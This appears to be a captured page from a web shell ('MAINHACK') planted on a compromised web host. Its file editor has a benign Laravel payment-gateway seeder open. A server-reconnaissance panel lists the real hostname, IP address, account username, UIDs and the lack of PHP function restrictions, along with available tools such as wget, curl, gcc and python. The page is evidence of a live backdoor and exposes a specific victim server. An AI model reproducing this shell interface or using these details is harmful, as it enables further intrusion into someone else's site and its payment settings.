[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: PaymentGatewayTableSeederVersionTwo.php
<?php namespace Database\Seeders; use App\Enums\GatewayMode; use App\Enums\Activity; use App\Enums\InputType; use App\Models\GatewayOption; use App\Models\PaymentGateway; use Illuminate\Database\Seeder; class PaymentGatewayTableSeederVersionTwo extends Seeder { /** * Run the database seeds. * * @return void */ public array $gateways = [ [ "name" => "TwoCheckout", "slug" => "twocheckout", "misc" => null, "status" => Activity::DISABLE, "options" => [ [ "option" => 'twocheckout_seller_id', "type" => InputType::TEXT, "activities" => '' ], [ "option" => 'twocheckout_secret_key', "type" => InputType::TEXT, "activities" => '' ], [ "option" => 'twocheckout_buy_link_secret_word', "type" => InputType::TEXT, "activities" => '' ], [ "option" => 'twocheckout_mode', "type" => InputType::SELECT, "activities" => [ GatewayMode::SANDBOX => 'sandbox', GatewayMode::LIVE => 'live' ] ], [ "option" => 'twocheckout_status', "value" => Activity::DISABLE, "type" => InputType::SELECT, "activities" => [ Activity::ENABLE => "enable", Activity::DISABLE => "disable", ] ], ] ] ]; public function run(): void { foreach ($this->gateways as $gateway) { $payment = PaymentGateway::create([ 'name' => $gateway['name'], 'slug' => $gateway['slug'], 'misc' => json_encode($gateway['misc']), 'status' => $gateway['status'] ]); if (file_exists(public_path('/images/seeder/payment-gateway/' . strtolower(str_replace(' ', '_', $gateway['slug'])) . '.png'))) { $payment->addMedia(public_path('/images/seeder/payment-gateway/' . strtolower(str_replace(' ', '_', $gateway['slug'])) . '.png'))->preservingOriginal()->toMediaCollection('payment-gateway'); } $this->gatewayOption($payment->id, $gateway['options']); } } public function gatewayOption($id, $options): void { if (!blank($options)) { foreach ($options as $option) { GatewayOption::create([ 'model_id' => $id, 'model_type' => PaymentGateway::class, 'option' => $option['option'], 'value' => $option['value'] ?? "", 'type' => $option['type'], 'activities' => json_encode($option['activities']), ]); } } } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.87 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285